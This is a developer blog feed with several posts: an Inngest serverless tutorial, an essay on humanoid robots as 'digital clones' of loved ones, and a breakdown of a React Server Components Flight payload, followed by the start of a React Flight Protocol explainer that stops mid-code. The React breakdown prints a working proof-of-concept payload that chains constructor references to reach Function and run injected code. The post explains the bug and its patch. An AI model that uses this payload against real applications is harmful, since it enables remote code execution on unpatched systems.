<span class="hljs-keyword">import</span> { inngest } <span class="hljs-keyword">from</span> <span class="hljs-string">"../../../inngest/client"</span>;

<span class="hljs-comment">// Create an API that serves zero functions</span>
<span class="hljs-keyword">export</span> <span class="hljs-keyword">const</span> { GET, POST, PUT } = serve({
  client: inngest,
  functions: [
    <span class="hljs-comment">/* your functions will be passed here later! */</span>
  ],
});
</code></pre>
<h3 id="heading-create-your-first-inngest-function">Create your first Inngest Function</h3>
<p>In this step, we will write our first reliable serverless function. This function will be triggered whenever a specific event occurs (in our case, it will be <code>test/hello.world</code>). Then, it will sleep for a second and return a greeting.</p>
<p>Inside your <code>src/inngest</code> directory create a new file called <code>functions.ts</code> where you will define Inngest functions. Add the following code:</p>
<pre><code class="lang-typescript"><span class="hljs-keyword">import</span> { inngest } <span class="hljs-keyword">from</span> <span class="hljs-string">"./client"</span>;

<span class="hljs-keyword">export</span> <span class="hljs-keyword">const</span> helloWorld = inngest.createFunction(
  { id: <span class="hljs-string">"hello-world"</span> },
  { event: <span class="hljs-string">"test/hello.world"</span> },
  <span class="hljs-keyword">async</span> ({ event, step }) =&gt; {
    <span class="hljs-keyword">await</span> step.sleep(<span class="hljs-string">"wait-a-moment"</span>, <span class="hljs-string">"1s"</span>);
    <span class="hljs-keyword">return</span> { message: <span class="hljs-string">`Hello <span class="hljs-subst">${event.data.email}</span>!`</span> };
  },
);
</code></pre>
<p>Now we will add the function to <code>serve()</code>. Import your Inngest function in the route handler (<code>src/app/api/inngest/route.ts</code>) and add it to the <code>serve</code> handler so Inngest can invoke it via HTTP:</p>
<pre><code class="lang-typescript"><span class="hljs-keyword">import</span> { serve } <span class="hljs-keyword">from</span> <span class="hljs-string">"inngest/next"</span>;
<span class="hljs-keyword">import</span> { inngest } <span class="hljs-keyword">from</span> <span class="hljs-string">"../../../inngest/client"</span>;
<span class="hljs-keyword">import</span> { helloWorld } <span class="hljs-keyword">from</span> <span class="hljs-string">"../../../inngest/functions"</span>;

<span class="hljs-keyword">export</span> <span class="hljs-keyword">const</span> { GET, POST, PUT } = serve({
  client: inngest,
  functions: [
    helloWorld, <span class="hljs-comment">// &lt;-- This is where you'll always add all your functions</span>
  ],
});
</code></pre>
<h2 id="heading-trigger-your-function-from-the-inngest-dev-server-ui">Trigger your function from the Inngest Dev Server UI</h2>
<p>Inngest is powered by events. You will trigger your function in two ways: first, by invoking it directly from the Inngest Dev Server UI, and then by sending events from code.</p>
<p>With your Next.js app and the Inngest Dev Server running, open the Inngest Dev Server UI and select the "Functions" tab at <a target="_blank" href="http://localhost:8288/functions"><code>http://localhost:8288/functions</code></a>. You should see your function. (Note: if you don't see any functions, select the "Apps" tab to troubleshoot.)</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1769967718163/c017fb80-bf87-4fc7-bb28-033f53725692.png" alt class="image--center mx-auto" /></p>
<p>To trigger your function, use the "Invoke" button for the associated function:</p>
<p>In the pop-up editor, add your event payload data as in the example below. This can be any JSON, and you can use this data within your function's handler. Then press the "Invoke Function" button:</p>
<pre><code class="lang-json">{
  <span class="hljs-string">"data"</span>: {
    <span class="hljs-string">"email"</span>: <span class="hljs-string">"test@example.com"</span>
  }
}
</code></pre>
<p>The payload is sent to the locally running Inngest Dev Server, which automatically executes your function in the background. You can see the new function run logged in the "Runs" tab:</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1769967870020/1736a8ac-5445-457f-902a-465e9959e100.png" alt class="image--center mx-auto" /></p>
<p>When you click on the run, you will see more information about the event, such as which function was triggered, its payload, output, and timeline:</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1769967929418/5e7abaeb-2584-43ac-9141-f2866560765e.png" alt class="image--center mx-auto" /></p>
<h3 id="heading-triggering-from-code">Triggering from code</h3>
<p>To trigger Inngest functions to run in the background, you will need to send events from your application to Inngest. Once the event is received, it will automatically invoke all functions that are configured to be triggered by it.</p>
<p>To send an event from your code, use the Inngest client's <code>send()</code> method, for example from a route handler such as <code>src/app/api/hello/route.ts</code>:</p>
<pre><code class="lang-typescript"><span class="hljs-keyword">import</span> { NextResponse } <span class="hljs-keyword">from</span> <span class="hljs-string">"next/server"</span>;
<span class="hljs-keyword">import</span> { inngest } <span class="hljs-keyword">from</span> <span class="hljs-string">"../../../inngest/client"</span>; <span class="hljs-comment">// Import our client</span>

<span class="hljs-comment">// Opt out of caching; every request should send a new event</span>
<span class="hljs-keyword">export</span> <span class="hljs-keyword">const</span> dynamic = <span class="hljs-string">"force-dynamic"</span>;

<span class="hljs-comment">// Create a simple async Next.js API route handler</span>
<span class="hljs-keyword">export</span> <span class="hljs-keyword">async</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">GET</span>(<span class="hljs-params"></span>) </span>{
  <span class="hljs-comment">// Send your event payload to Inngest</span>
  <span class="hljs-keyword">await</span> inngest.send({
    name: <span class="hljs-string">"test/hello.world"</span>,
    data: {
      email: <span class="hljs-string">"testUser@example.com"</span>,
    },
  });

  <span class="hljs-keyword">return</span> NextResponse.json({ message: <span class="hljs-string">"Event sent!"</span> });
}
</code></pre>
<p>Every time this API route is requested, an event is sent to Inngest. To test it, open <a target="_blank" href="http://localhost:3000/api/hello"><code>http://localhost:3000/api/hello</code></a> (change the port if your Next.js app is running elsewhere). You should see the following output: <code>{"message":"Event sent!"}</code></p>
<p>If you go back to the Inngest Dev Server, you will see a new run is triggered by this event:</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1769968090377/8e845141-aab2-4d8f-9a8b-9afdad086ed2.png" alt class="image--center mx-auto" /></p>
<p>That’s it! You have learned how to create Inngest functions and how to send events to trigger them.</p>
]]></content:encoded></item><item><title><![CDATA[Digital Echo - When Humanoid Robots Learn Our Loved One's Essence]]></title><description><![CDATA[The dream of intelligent machines has captivated humanity for centuries. From the earliest automata to the sophisticated androids of science fiction, we've envisioned creations that mirror ourselves, not just in form, but in interaction and intellige...]]></description><link>https://blog.nidhin.dev/digital-echo-when-humanoid-robots-learn-our-loved-ones-essence</link><guid isPermaLink="true">https://blog.nidhin.dev/digital-echo-when-humanoid-robots-learn-our-loved-ones-essence</guid><category><![CDATA[imitationlearning]]></category><category><![CDATA[robotics]]></category><category><![CDATA[Artificial Intelligence]]></category><category><![CDATA[humanoid robot]]></category><category><![CDATA[Machine Learning]]></category><category><![CDATA[Reinforcement Learning]]></category><category><![CDATA[nlp]]></category><category><![CDATA[neural networks]]></category><dc:creator><![CDATA[nidhinkumar]]></dc:creator><pubDate>Sun, 28 Dec 2025 15:04:21 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1766933236902/9ecbf2b0-ca31-493d-b448-c2a020ed6eff.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>The dream of intelligent machines has captivated humanity for centuries. From the earliest automata to the sophisticated androids of science fiction, we've envisioned creations that mirror ourselves, not just in form, but in interaction and intelligence.</p>
<p>Today, this dream is closer to reality than ever, ushering in an era where humanoid robots are not just performing tasks, but learning the very nuances of human behavior. What if this learning could extend to preserving the unique essence of our loved ones, creating digital echoes in a physical form?</p>
<h2 id="heading-from-industrial-arms-to-graceful-giants-the-rise-of-humanoid-robotics">From Industrial Arms to Graceful Giants: The Rise of Humanoid Robotics</h2>
<p>For decades, robots have been synonymous with precision and power on factory floors. But a new generation of robotics is emerging, exemplified by agile machines like the Unitree G1 and Tesla's Optimus (a.k.a. the Tesla Bot), which can dance, jump, and navigate complex terrain with remarkable fluidity.</p>
<p>Companies like Boston Dynamics have pushed the boundaries of bipedal locomotion, while the synchronized performances of humanoid robots in places like <a target="_blank" href="https://interestingengineering.com/ai-robotics/china-humanoid-robots-dance-chengdu-concert">Chengdu</a> showcase their growing dexterity and coordination. These are no longer just tools; they are platforms designed for dynamic interaction in human environments.</p>
<p>But what truly unlocks the potential for these robots to integrate into our lives is their ability to <em>learn</em> and <em>adapt</em>. This is where the sophisticated interplay of Artificial Intelligence, particularly <strong>Imitation Learning</strong> and <strong>Reinforcement Learning</strong>, comes into play.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1766931781979/9709fae6-ca93-41f6-a2ce-7136c08456dc.png" alt class="image--center mx-auto" /></p>
<h2 id="heading-the-art-of-mimicry-and-the-science-of-mastery-how-robots-learn-like-us">The Art of Mimicry and the Science of Mastery: How Robots Learn Like Us</h2>
<p>Imagine teaching a robot to make a cup of tea exactly as your grandparent would, with their particular flourish and their specific way of holding the kettle. This isn't just about programming a sequence of steps; it's about capturing a nuanced, human behavior.</p>
<h3 id="heading-imitation-learning-il">Imitation Learning (IL)</h3>
<p><strong>Imitation Learning (IL)</strong>, also known as Learning from Demonstration, is the robot's first step into mimicking human actions. It's akin to a child learning by watching an adult. The robot observes an "expert" (a human) performing a task – perhaps through video recordings, motion capture, or direct physical guidance. It collects a dataset of what the expert sees (the "state" of the world) and what the expert does (the "action" they take). Using this data, the robot trains a predictive model, often a neural network, to map observations directly to actions.</p>
<p>The beauty of imitation learning is its simplicity and speed. It provides a "warm start," quickly giving the robot a baseline of desired behavior. It bypasses the need for the robot to figure things out from scratch, which can be inefficient or even dangerous in the real world. For learning subtle gestures, specific walking gaits, or even characteristic vocal inflections, imitation learning is invaluable.</p>
<p>However, pure imitation has its limits. What happens if the environment changes slightly, or if the robot encounters a situation not explicitly covered in the training data? This is where <strong>Reinforcement Learning (RL)</strong> steps in, elevating the robot from a mimic to a true learner.</p>
<h3 id="heading-reinforcement-learning-rl">Reinforcement Learning (RL)</h3>
<p>Reinforcement Learning is the process of learning through trial and error, guided by a system of rewards. The robot, now an "agent," interacts with its environment, taking actions and receiving feedback in the form of numerical "rewards" or "penalties." Its goal is to discover a "policy" – a strategy that tells it what to do in any given situation to maximize its cumulative reward over time.</p>
<p>Think of it this way: Imitation Learning teaches the robot <em>how</em> to make tea like your grandparent. Reinforcement Learning, layered on top, teaches it <em>to make good tea</em> by experimenting with water temperature, brewing time, or sugar levels, and learning from the resulting "deliciousness" (reward) or "bitterness" (penalty) feedback. It allows the robot to adapt, generalize, and even surpass the original expert's performance by discovering more optimal strategies.</p>
<p>The most advanced systems combine both: Imitation Learning provides a robust initial policy, getting the robot close to expert-level performance. Then, Reinforcement Learning takes over, fine-tuning that policy, allowing the robot to adapt to new situations, personalize its interactions, and continuously improve its performance beyond mere mimicry. This synergy is critical for creating robots that are not just animated dolls, but responsive, evolving entities.</p>
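The trial-and-error loop described above can be caricatured in a few lines of code. The following toy TypeScript sketch (all names, actions, and reward numbers are invented for illustration, and it is a bandit-style simplification, not a real robotics pipeline) shows an agent refining a per-action value estimate from rewards and then exploiting what it learned:

```typescript
// Toy sketch of the reward loop: the agent picks a brewing time (the
// "action"), tastes the tea (the "reward"), and refines a running value
// estimate per action. All names and numbers here are illustrative.
type Action = number; // brewing time in minutes

const actions: Action[] = [1, 2, 3, 4, 5];
const valueEstimates = new Map<Action, number>();
const counts = new Map<Action, number>();

// Hidden "environment": tea brewed for 3 minutes tastes best.
function reward(a: Action): number {
  return 10 - Math.abs(a - 3) * 3;
}

// Initialize each estimate with one observed reward.
for (const a of actions) {
  counts.set(a, 1);
  valueEstimates.set(a, reward(a));
}

function chooseAction(epsilon: number): Action {
  if (Math.random() < epsilon) {
    // explore: try a random brewing time
    return actions[Math.floor(Math.random() * actions.length)];
  }
  // exploit: pick the action with the highest current estimate
  let best = actions[0];
  for (const a of actions) {
    if ((valueEstimates.get(a) ?? 0) > (valueEstimates.get(best) ?? 0)) best = a;
  }
  return best;
}

// Trial-and-error loop: act, observe the reward, update the running mean.
for (let step = 0; step < 200; step++) {
  const a = chooseAction(0.1);
  const n = (counts.get(a) ?? 0) + 1;
  counts.set(a, n);
  const old = valueEstimates.get(a) ?? 0;
  valueEstimates.set(a, old + (reward(a) - old) / n);
}

const learned = chooseAction(0); // greedy choice after training
console.log(`Learned best brewing time: ${learned} minutes`);
```

Conceptually, replacing the hand-written <code>reward</code> function with human feedback (or demonstrations, in the imitation-learning phase) is what separates this toy from the personalization loop described above.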
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1766931853168/68e37e69-3f24-4e2c-846e-ad0989b3c6c7.png" alt class="image--center mx-auto" /></p>
<h2 id="heading-metadata-of-a-life-crafting-digital-clones">Metadata of a Life: Crafting Digital Clones</h2>
<p>Now, let's push the boundaries of this technology. What if the "expert" data we feed these learning algorithms isn't just a generic demonstration, but the incredibly rich "metadata" of a specific individual – a loved one?</p>
<p>Imagine curating a vast digital archive:</p>
<ul>
<li><p><strong>Speech and Audio:</strong> Recordings of conversations, voice messages, interviews, videos. AI-powered <strong>Natural Language Processing (NLP)</strong> and <strong>Speech Synthesis</strong> could learn their unique vocabulary, sentence structure, tone, rhythm, and even subtle vocal quirks, allowing a robot to speak <em>like</em> them.</p>
</li>
<li><p><strong>Visual Data:</strong> Thousands of photos and videos capturing their facial expressions, body language, gestures, how they walk, how they laugh. <strong>Computer Vision</strong> algorithms could extract these patterns, enabling the robot to animate its face and move its body with their characteristic mannerisms.</p>
</li>
<li><p><strong>Textual Data:</strong> Emails, messages, social media posts, written documents, diaries. This provides insight into their personality, beliefs, sense of humor, and conversational style, which an advanced <strong>Language Model</strong> could learn to emulate.</p>
</li>
<li><p><strong>Behavioral Patterns:</strong> Even data from wearable devices could contribute, hinting at activity levels, sleep patterns, or daily routines, helping to inform a holistic digital profile.</p>
</li>
</ul>
<p>This aggregated "metadata of a life" becomes the blueprint for a <strong>digital clone</strong> – an AI entity trained to capture and express the essence of a person. Integrated into an advanced humanoid robot, this digital clone could manifest as a physical presence.</p>
<h2 id="heading-recent-advancements">Recent Advancements</h2>
<ol>
<li><p>Tesla's Optimus Gen 3 entered factory pilots in late 2025, autonomously sorting batteries and performing up to 100 daily tasks like cooking after learning from videos alone.</p>
</li>
<li><p><a target="_blank" href="https://www.unitree.com/">Unitree</a> G1, at $16,000, debuted in Chinese warehouses for hazardous inspections and healthcare rehab, showcasing dexterous hands for real-time adaptation.</p>
</li>
<li><p><a target="_blank" href="https://www.figure.ai/news/introducing-figure-03">Figure</a> 02 deployed in US manufacturing sites with Mercedes-Benz, using AI vision to manipulate diverse objects in logistics picking tasks.</p>
</li>
<li><p>Boston Dynamics' electric Atlas demonstrated RL-trained dynamic maneuvers at the 2025 World Robot Conference in Beijing, aiding disaster simulations.</p>
</li>
<li><p>Agility Robotics' Digit began Amazon warehouse operations worldwide, navigating uneven floors and ramps for tote handling where wheeled robots fail.</p>
</li>
<li><p>Unitree G1 performed synchronized dances at Chengdu concerts, highlighting coordination for entertainment uses.</p>
</li>
</ol>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1766931860753/a63ed136-a9ad-4d69-a97c-b777ab1648cc.png" alt class="image--center mx-auto" /></p>
<h3 id="heading-the-future-a-new-frontier-of-connection">The Future: A New Frontier of Connection</h3>
<p>As we stand on the precipice of this "post-biological" age, the integration of digital clones into humanoid bodies isn't just a matter of "when," but "how." We are moving toward a world where the people we love don't just live on in photos or memories, but as interactive, physical companions.</p>
<p>A robot trained on a lifetime of metadata could offer a form of <strong>"Digital Immortality."</strong> It could tell your grandchildren stories about your youth in your own voice, replicate the exact way you tilt your head when you're thinking, and continue to learn and grow alongside your family through Reinforcement Learning.</p>
<h2 id="heading-the-heart-in-the-machine">The Heart in the Machine</h2>
<p>While the technical hurdles—crossing the "Uncanny Valley" and perfecting multi-modal learning—are being cleared at breakneck speed, the true challenge lies in the soul of the endeavor.</p>
<p>As we combine our "dear ones'" metadata with these graceful giants, we must ask ourselves:</p>
<ul>
<li><p><strong>Consent and Legacy:</strong> Who owns the digital echo of a person? Does a "digital twin" have rights, and how do we ensure a loved one’s data is used to honor them, not just mimic them?</p>
</li>
<li><p><strong>The Nature of Grief:</strong> Does having a physical "copy" help us heal, or does it prevent us from letting go?</p>
</li>
<li><p><strong>Authenticity vs. Algorithm:</strong> Can a machine, no matter how well-trained via RL and Imitation, truly capture the "spark" that makes us human, or will it always be a high-fidelity reflection?</p>
</li>
</ul>
<p>The future of humanoid robotics is more than just a leap in engineering; it is a dance on the mirror's edge between memory and machinery. As these robots enter our homes, they won't just be tools or entertainers—they will be vessels for our most precious data: <strong>our identity.</strong></p>
<h2 id="heading-references">References</h2>
<ol>
<li><p>Unitree - <a target="_blank" href="https://www.unitree.com/g1">https://www.unitree.com/g1</a></p>
</li>
<li><p>Figure - <a target="_blank" href="https://www.figure.ai/">https://www.figure.ai/</a></p>
</li>
<li><p>Agility Robotics - <a target="_blank" href="https://www.agilityrobotics.com/solution">https://www.agilityrobotics.com/solution</a></p>
</li>
</ol>
]]></content:encoded></item><item><title><![CDATA[Decoding the Flight Payload in React Server Components]]></title><description><![CDATA[If you’ve worked with React Server Components (RSC), you know the server streams a special payload to the client using the React Flight protocol. At first glance, it looks like harmless serialized data — just chunks that eventually turn into UI.
But ...]]></description><link>https://blog.nidhin.dev/decoding-the-flight-payload-in-react-server-components</link><guid isPermaLink="true">https://blog.nidhin.dev/decoding-the-flight-payload-in-react-server-components</guid><category><![CDATA[React]]></category><category><![CDATA[rsc]]></category><category><![CDATA[JavaScript]]></category><category><![CDATA[react internals]]></category><category><![CDATA[deserialization]]></category><dc:creator><![CDATA[nidhinkumar]]></dc:creator><pubDate>Sun, 21 Dec 2025 15:42:45 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1766337231528/614c8a91-605f-458c-8b68-4da16978ff56.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>If you’ve worked with React Server Components (RSC), you know the server streams a special payload to the client using the React Flight protocol. At first glance, it looks like harmless serialized data — just chunks that eventually turn into UI.</p>
<p>But what if an attacker could inject their own chunks into that stream?</p>
<p>A security researcher, <strong>Lachlan Davidson</strong>, demonstrated that by abusing React’s internal <em>Flight Reviver</em> logic, it’s possible to turn a crafted RSC payload into <strong>arbitrary JavaScript execution on the client</strong>.</p>
<h2 id="heading-1react-server-component">1. React Server Components</h2>
<p>With React Server Components, the server doesn’t actually send JavaScript; it sends a serialized description of the JSX (the React Flight Protocol). On the server, the rendered JSX is converted into a React Flight payload; the client receives that payload, deserializes it, and renders the resulting HTML.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1766328747890/fd532481-f044-4158-b526-9ab48acade8d.png" alt class="image--center mx-auto" /></p>
<h2 id="heading-2lets-decode-the-payload">2. Let’s Decode the Payload</h2>
<p>Here is the payload shared by Lachlan Davidson:</p>
<pre><code class="lang-typescript"><span class="hljs-keyword">const</span> payload = {
    <span class="hljs-string">'0'</span>: <span class="hljs-string">'$1'</span>,
    <span class="hljs-string">'1'</span>: {
        <span class="hljs-string">'status'</span>:<span class="hljs-string">'resolved_model'</span>,
        <span class="hljs-string">'reason'</span>:<span class="hljs-number">0</span>,
        <span class="hljs-string">'_response'</span>:<span class="hljs-string">'$4'</span>,
        <span class="hljs-string">'value'</span>:<span class="hljs-string">'{"then":"$3:map","0":{"then":"$B3"},"length":1}'</span>,
        <span class="hljs-string">'then'</span>:<span class="hljs-string">'$2:then'</span>
    },
    <span class="hljs-string">'2'</span>: <span class="hljs-string">'$@3'</span>,
    <span class="hljs-string">'3'</span>: [],
    <span class="hljs-string">'4'</span>: {
        <span class="hljs-string">'_prefix'</span>:<span class="hljs-string">'console.log(7*7+1)//'</span>,
        <span class="hljs-string">'_formData'</span>:{
            <span class="hljs-string">'get'</span>:<span class="hljs-string">'$3:constructor:constructor'</span>
        },
        <span class="hljs-string">'_chunks'</span>:<span class="hljs-string">'$2:_response:_chunks'</span>,
    }
}
</code></pre>
<p>At first glance, you might wonder whether this is even React. It is: this is the payload the server sends to the client in chunks.</p>
<p>In React Server Components (RSC), the server sends "chunks" of data to the client. React "revives" these chunks into UI. The vulnerability occurs when an attacker crafts a chunk that looks like a <strong>Promise</strong> (a "Thenable") to trick React's internal parser into executing code.</p>
<h2 id="heading-3breakdown-of-the-payload">3. Breakdown of the Payload</h2>
<h3 id="heading-01-the-entry-point-chunk-0">01. The Entry Point (Chunk 0)</h3>
<p><code>'0': '$1'</code> React starts parsing at Chunk 0. It sees <code>$1</code>, which is a pointer telling React: "Go look at Chunk 1 to find out what I am."</p>
<h3 id="heading-02-the-thenable-trap-chunk-1">02. The "Thenable" Trap (Chunk 1)</h3>
<p>This is where the magic happens. In JavaScript, any object with a <code>.then()</code> method is treated like a Promise.</p>
<ul>
<li><p><code>status: 'resolved_model'</code>: This tells React the "Promise" is already finished and ready to be processed.</p>
</li>
<li><p><code>then: '$2:then'</code>: This tells React to use the <code>.then</code> method found in Chunk 2.</p>
</li>
</ul>
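The thenable rule itself is plain JavaScript behavior and easy to verify. In this small standalone sketch (not React code), <code>await</code> happily drives an ordinary object's <code>then</code> method as if it were a real Promise:

```typescript
// Minimal demo of a "thenable": any plain object with a `then` method is
// treated like a Promise by `await`. This is the hook the crafted chunk abuses.
const thenable = {
  then(resolve: (value: string) => void) {
    resolve("resolved by a plain object, not a real Promise");
  },
};

async function demo(): Promise<string> {
  // `await` sees `.then` and calls it as if this were a Promise
  return await thenable;
}

demo().then((value) => console.log(value));
```

React's reviver applies the same duck-typing, which is why a chunk that merely *claims* to have a <code>then</code> gets treated as a resolvable Promise.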
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1766331876315/490928f9-243b-403f-9b95-3500477338a8.png" alt class="image--center mx-auto" /></p>
<h3 id="heading-03-the-self-reference-trick-chunk-2-amp-3">03. The Self-Reference Trick (Chunk 2 &amp; 3)</h3>
<p><code>'2': '$@3'</code>, <code>'3': []</code> The <code>$@</code> symbol is a "self-reference." It creates a loop that allows the attacker to grab React's own internal <strong>Chunk Wrapper</strong> object. This wrapper has a built-in function that React uses to process data. By grabbing this, the attacker can now run React’s internal code on their own malicious data.</p>
<h3 id="heading-04-injecting-the-malicious-json">04. Injecting the Malicious JSON</h3>
<p><code>'value':'{"then":"$3:map","0":{"then":"$B3"},"length":1}'</code> Once React starts "resolving" Chunk 1, it parses this string. The <code>$B3</code> is the "nuclear option." The <code>B</code> prefix tells React: "This is a Blob, go fetch it using the <code>_formData.get</code> method."</p>
<h3 id="heading-05-hijacking-the-constructor-chunk-4">05. Hijacking the Constructor (Chunk 4)</h3>
<p>This is the "Pro" move. The attacker redefines what <code>_formData.get</code> actually is:</p>
<ul>
<li><p><code>_formData.get</code>: <code>'$3:constructor:constructor'</code></p>
<ul>
<li><p>Chunk 3 is an array (<code>[]</code>).</p>
</li>
<li><p><code>[].constructor</code> is the <code>Array</code> function.</p>
</li>
<li><p><code>Array.constructor</code> is the global <code>Function</code> object (which works like <code>eval</code>).</p>
</li>
</ul>
</li>
<li><p><code>_prefix</code>: <code>console.log(7*7+1)//</code></p>
<ul>
<li>This is the code to be run. The <code>//</code> is vital because React appends a character at the end. The <code>//</code> comments it out so the code doesn't crash!</li>
</ul>
</li>
</ul>
<p>Without the trailing <code>//</code> in <code>console.log(7*7+1)//</code>, the code</p>
<pre><code class="lang-typescript"> <span class="hljs-keyword">return</span> response._formData.get(response._prefix + blobId);
</code></pre>
<p>would execute</p>
<pre><code class="lang-typescript"><span class="hljs-built_in">Function</span>(<span class="hljs-string">"console.log(7*7+1)3"</span>) <span class="hljs-comment">// Syntax error! The appended '3' is invalid</span>
</code></pre>
<p>With the trailing comment <code>//</code>, it causes no error:</p>
<pre><code class="lang-typescript"><span class="hljs-string">'_prefix'</span>: <span class="hljs-string">'console.log(7*7+1)//'</span>

<span class="hljs-built_in">Function</span>(<span class="hljs-string">"console.log(7*7+1)//3"</span>) <span class="hljs-comment">// the appended '3' is now inside a comment, so it is ignored 🔥</span>
</code></pre>
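You can verify the gadget chain in isolation. This standalone sketch (it uses <code>return</code> instead of <code>console.log</code> so the result is observable) walks from an empty array to the global <code>Function</code> constructor and shows the trailing <code>//</code> neutralizing the appended id:

```typescript
// Sketch of the gadget chain from the payload: starting from a plain array,
// `constructor.constructor` reaches the global Function constructor, which
// compiles strings into executable code much like eval.
const arr: unknown[] = [];

// [].constructor is Array; Array.constructor is Function
const FunctionCtor = (arr.constructor as any).constructor;
console.log(FunctionCtor === Function); // true

const prefix = "return 7*7+1//"; // trailing // comments out whatever follows
const appendedId = "3"; // stands in for the blob id React appends
const fn = FunctionCtor(prefix + appendedId);
console.log(fn()); // 50 — the appended "3" was commented out
```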
<h2 id="heading-final-notes">Final Notes</h2>
<p>This issue was reported to Meta by Lachlan Davidson, and the React team shipped a patch that adds <code>hasOwnProperty</code> checks (<a target="_blank" href="https://github.com/facebook/react/pull/35277/files">https://github.com/facebook/react/pull/35277/files</a>), along with further hardening fixes.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1766338864119/b4302340-d57c-4697-bfca-6e1c11723d5d.png" alt class="image--center mx-auto" /></p>
<p>That marks the end of decoding the Flight protocol payload. I'll catch up with you in another interesting post soon 😄</p>
]]></content:encoded></item><item><title><![CDATA[React Flight Protocol]]></title><description><![CDATA[The introduction of React Server Components (RSC) marked a paradigm shift in how we build React applications, allowing developers to leverage server-side capabilities directly within their component tree. But how do these server-rendered components c...]]></description><link>https://blog.nidhin.dev/react-flight-protocol</link><guid isPermaLink="true">https://blog.nidhin.dev/react-flight-protocol</guid><category><![CDATA[flightprotocol]]></category><category><![CDATA[reactflightprotocol]]></category><category><![CDATA[React]]></category><category><![CDATA[react server components]]></category><category><![CDATA[React2Shell]]></category><category><![CDATA[Next.js]]></category><category><![CDATA[Vercel]]></category><category><![CDATA[vulnerability]]></category><dc:creator><![CDATA[nidhinkumar]]></dc:creator><pubDate>Sun, 14 Dec 2025 15:04:17 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1765724018558/ee629a35-fb09-4c04-885f-4f02da196d45.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>The introduction of React Server Components (RSC) marked a paradigm shift in how we build React applications, allowing developers to leverage server-side capabilities directly within their component tree. But how do these server-rendered components communicate with the client-side React runtime? The answer lies in the <strong>React Flight Protocol</strong>, a specialized wire format designed to transmit the serialized React element tree from the server to the client.</p>
<p>This post will dive deep into the React Flight Protocol, explaining its structure, how it handles various data types, and why it's a foundational technology for the future of web development.</p>
<h2 id="heading-1client-side-rendering">1. Client-Side Rendering</h2>
<p>For years, React applications predominantly embraced a client-side rendering (CSR) model, where the browser downloaded a large JavaScript bundle, hydrated the DOM, and managed all subsequent UI updates. While powerful, this approach often led to:</p>
<ul>
<li><p><strong>Large JavaScript bundles</strong>: Shipping UI logic, data fetching, and state management to the client.</p>
</li>
<li><p><strong>Waterfall data fetching</strong>: Client components often had to fetch data sequentially, leading to slower perceived load times.</p>
</li>
<li><p><strong>Complex server-side rendering (SSR) hydration</strong>: Reconciling server-generated HTML with client-side React.</p>
</li>
</ul>
<p>React Server Components address these challenges by enabling developers to render components entirely on the server, keeping their code and data fetching logic off the client bundle. The magic that bridges the server and client in this new architecture is the <strong>React Flight Protocol</strong>.</p>
<h2 id="heading-2what-is-react-flight-protocol">2. What is React Flight Protocol?</h2>
<p>At its core, the React Flight Protocol is a <strong>compact, streaming, JSON-like serialization format</strong> specifically designed to represent a React element tree. It's not HTML; it's a <em>description</em> of the UI, including:</p>
<ol>
<li><p><strong>React elements</strong>: The structure of your components (e.g., <code>&lt;div&gt;</code>, <code>&lt;MyComponent&gt;</code>).</p>
</li>
<li><p><strong>Props</strong>: Data passed to components.</p>
</li>
<li><p><strong>Client Component references</strong>: Pointers to client-side code that needs to be loaded and rendered on the browser.</p>
</li>
<li><p><strong>Server Action references</strong>: Pointers to server-side functions that can be invoked from the client.</p>
</li>
</ol>
<p>Crucially, the Flight Protocol allows React to send only the <em>necessary instructions</em> to the client. Server-only code, sensitive data, and large dependencies stay on the server, resulting in significantly smaller client-side bundles and improved performance.</p>
<h2 id="heading-3react-flight-protocol-vs-react-server-components-protocol-a-clarification"><strong>3. React Flight Protocol vs. React Server Components Protocol: A Clarification</strong></h2>
<p>It's common to hear both "React Flight Protocol" and "React Server Components Protocol" used interchangeably. To be precise:</p>
<ul>
<li><p><strong>React Server Components (RSC)</strong> is the <em>feature</em> that allows you to write components that render exclusively on the server, with zero client-side JavaScript.</p>
</li>
<li><p>The <strong>React Flight Protocol</strong> is the <em>underlying technical specification and wire format</em> that enables RSCs to function. It's the language the server and client speak to exchange UI updates.</p>
</li>
</ul>
<p>Therefore, there isn't a separate, distinct "React Server Components Protocol." When people refer to it, they are almost certainly referring to the React Flight Protocol itself. The Flight Protocol <em>is</em> the protocol used by Server Components.</p>
<h2 id="heading-4how-react-flight-protocol-works-under-the-hood"><strong>4. How React Flight Protocol Works Under the Hood</strong></h2>
<p>The Flight Protocol is a stream of instructions and data. Unlike a single HTTP response that delivers a complete HTML page or a JSON API payload, the Flight stream can deliver parts of the UI as they are ready, interweaving different types of information.</p>
<h3 id="heading-the-streamable-interleaved-format"><strong>The Streamable, Interleaved Format</strong></h3>
<p>The protocol uses a custom, line-delimited format where each line typically starts with a single character indicating the type of instruction, followed by an ID and then the associated data. This allows the client to parse and process the stream incrementally.</p>
<p>Common instruction types include:</p>
<ul>
<li><p><code>J</code>: JSON data (e.g., props, element structures).</p>
</li>
<li><p><code>M</code>: Module reference (for Client Components).</p>
</li>
<li><p><code>A</code>: Asynchronous instruction (e.g., for Suspense boundaries).</p>
</li>
<li><p><code>S</code>: Symbol reference (e.g., <code>$$typeof</code> for React elements).</p>
</li>
<li><p><code>R</code>: Root element.</p>
</li>
</ul>
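<p>To make the shape concrete, here is a toy parser for this line-delimited format. This is an illustrative sketch only: the row tags above are simplified, and the real parser in the <code>react-server-dom-*</code> packages is considerably more involved.</p>

```typescript
// Toy parser for the simplified row format described above (illustrative only).
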